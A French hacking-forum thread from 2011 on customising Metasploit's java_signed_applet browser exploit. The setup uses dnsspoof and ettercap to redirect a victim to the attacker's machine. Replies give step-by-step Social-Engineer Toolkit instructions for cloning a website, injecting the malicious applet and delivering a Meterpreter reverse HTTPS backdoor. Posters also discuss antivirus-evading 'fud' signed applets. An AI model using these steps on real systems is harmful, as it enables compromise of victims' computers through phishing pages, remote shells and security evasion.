Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 26-06-2011 01:53:01

alg0
Membre
Inscription : 19-06-2011
Messages : 12

Utilisation java_signed_applet metasploit

Bonsoir,  big_smile

Je suis en train de tester meta avec l'exploit en java et dnsspoof pour la redirection et ettercap pour le Main in the middle tout cela pour pouvoir le rediriger vers moi et lui ouvrir l'exploit dans son navigateur sauf que mon problème qui n'est pas vraiment un problème c'est que  tout fonctionne sauf que je voudrais modifier  la page qui s'affiche sur son navigateur, par défaut ça lui affiche Loading, Please Wait... et donc je voudrais changer cette page et mettre une des miennes. Dans l'exploit je vois qui charge la page SiteLoader, j'ai essayer de la localiser avec " locate SiteLoader "  mais tout les fichiers que je vois ne son guère des sources HTML et je ne vois aucune source du fichier dans l'exploit. Si quelqu'un à déjà eu ce problème ou si quelqu'un aurait une idée je suis preneur big_smile

EDIT >>>>

J'ai un peu plus de détail pour mon problème.
J'ai regardé plus attentivement l'exploit et je pense qui faut que je modifie cette partie de code :

def generate_html
        html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
        html << %Q|<body><center><p>Loading, Please Wait...</p></center>\n|
        html << %Q|<applet archive="#{get_resource.sub(%r|/$|, '')}/#{datastore["APPLETNAME"]}.jar"\n|
        p html
        if @use_static
            html << %Q|  code="SiteLoader" width="1" height="1">\n|
        else
            html << %Q|  code="#{datastore["APPLETNAME"]}" width="1" height="1">\n|
        end
        html << %Q|</applet>\n</body></html>|
        return html
    end

Après je pense que je dois modifier la ligne 2-3 mais je suis pas sure : Qu'en pensait vous ?

Dernière modification par alg0 (26-06-2011 02:09:20)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 26-06-2011 06:54:50

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Utilisation java_signed_applet metasploit

Salut alg0

perso je ne toucherais pas ce fichier je lancerais l'exploit et alors j'irais chercher dans le serveur apache la page généré cela une fois fait je changerais son nom mettrais ma page en index html dans laquelle je mettrais une iframe transparente pointant sur la page de l'exploit

Bon teste

Hors Ligne

#3 26-06-2011 11:59:10

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Utilisation java_signed_applet metasploit

Le plus simple à mon avis c'est de passer par SET, qui te proposera d'aspirer une page web de ton choix et d'y intégrer l'applet java wink

Voilà comment faire sur BT5 :

cd /pentest/exploits/set
"Website attack vector"
"The Java Applet Attack Method"
"Site cloner"
[tu entres l'adresse que tu veux cloner]
[tu choisis l'exploit à exécuter, je conseille le Meterpreter Reverse HTTPS]
"backdoored executable"
[tu choisis un port d'écoute, le 4444 c'est bon]
[tu choisis si tu veux aussi intégrer un exploit pour Linux/MacOS]

Une fois que l'attaque est active, tu peux accéder au fake site via ton adresse IP, sur la machine victime.

Je te conseille de désactiver l'antivirus sur la machine victime quand tu fais ton test, le Meterpreter commence à être fort connu wink

Hors Ligne

#4 26-06-2011 13:28:39

alg0
Membre
Inscription : 19-06-2011
Messages : 12

Re : Utilisation java_signed_applet metasploit

Comment ça rechercher dans le server apache je ne vois pas trop de quoi tu parles ? sad

Antares pour SET je peux utiliser l'exploit java_signed_applet ?

Merci pour vos réponse smile

Hors Ligne

#5 26-06-2011 13:33:22

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Utilisation java_signed_applet metasploit

Oui, c'est pour ça que je t'ai indiqué la méthode "The Java Applet Attack Method" wink

Pour Apache, je pense que ce n'est pas applicable ici, la page a l'air générée en interne et donc n'est pas "remplaçable" facilement comme le proposait toto... hmm

La technique avec SET contourne ce problème ne "injectant" ton applet java sur n'importe quelle page clonée.

Hors Ligne

#6 26-06-2011 13:41:47

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Utilisation java_signed_applet metasploit

Désoler je pensais que l'on pouvais mais de toutes façon le plus simple pour passer les AV c'est de coder un applet signé cela est un o-day j'en ai trouver un pour mes testes le mien est toujours fud a l'heure actuel enfin comme je teste plus grand chose je perd le fil
@+

Hors Ligne

#7 26-06-2011 15:05:31

alg0
Membre
Inscription : 19-06-2011
Messages : 12

Re : Utilisation java_signed_applet metasploit

D'accord, comme je tourne sur Linux mint j'ai due installer set, tout tourne :
Là je suis arrivé à Metasploit path not found. Enter path to framework directory
Il faut que je rentre le répertoire de mon exploit ? ex " exploits/multi/browser " ?
Car là je suis un peu bloquer big_smile
Merci pour tes réponses antares smile

Hors Ligne

#8 26-06-2011 16:15:11

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Utilisation java_signed_applet metasploit

roll des fois j'me demande si vous imaginez qu'on connaît toutes les distributions par coeur...

Il faut que tu édites le fichier [whatever]/set/config/set_config, à la ligne 28 je pense, pour corriger ça :

METASPLOIT_PATH=/pentest/exploits/framework3/

remplace l'argument par le dossier où tu as installé metasploit (comme j'ai aucune idée de la façon dont tu l'as fait, je ne sais pas te dire lequel). il est très probable que tu doives adapter d'autres paramètres de ce fichier set_config wink

Je tiens à préciser que je ne connais pas Linux Mint (même si ça reste une Ubuntu), donc je ne donne aucune garantie sur l'aide que je pourrai apporter...

Hors Ligne

#9 26-06-2011 16:44:19

alg0
Membre
Inscription : 19-06-2011
Messages : 12

Re : Utilisation java_signed_applet metasploit

Ah ok d'accord nickel, ne vous inquietez pas je ne m'imagine pas que vous connaissez les distrib par coeur ce qui serait un peu dure big_smile
Merci pour votre réponse... big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]